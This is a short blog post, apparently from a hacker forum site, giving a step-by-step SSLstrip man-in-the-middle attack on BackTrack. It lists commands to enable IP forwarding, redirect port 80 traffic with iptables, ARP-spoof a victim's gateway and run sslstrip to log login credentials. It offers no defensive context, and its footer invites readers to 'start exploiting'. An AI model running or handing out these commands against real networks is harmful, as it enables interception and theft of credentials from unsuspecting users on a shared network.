SSL Strip using Backtrack
10:46 am
SSL Strip is a tool that hijacks HTTP traffic on a network by replacing all the HTTPS/SSL links with HTTP ones. Once SSL Strip is setup all the victim traffic will be routed through the attacker and HTTP traffic will be redirected to the attacker machine. The attacker will be able to obtain all logon information by sniffing the HTTP plaintext protocol.
How to:
1. Set up IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
2. Set up Port redirection using iptables
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1337
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1337
3. Start ARP MITM
arpspoof -i eth0 -t VICTIMIP GATEWAY
arpspoof -i eth0 -t VICTIMIP GATEWAY
4. Start SSL Strip Tool
sslstrip -l 1337 -w log.txt
sslstrip -l 1337 -w log.txt
5. Wait until the target login to a website that supposed to use HTTPS/SSL
6. Check log.txt for captured information
Written by Admin
Chennai hackers connect is a branch of Computer maniac.It is the platform for the HACKERS to connect and start exploiting.
0 comments: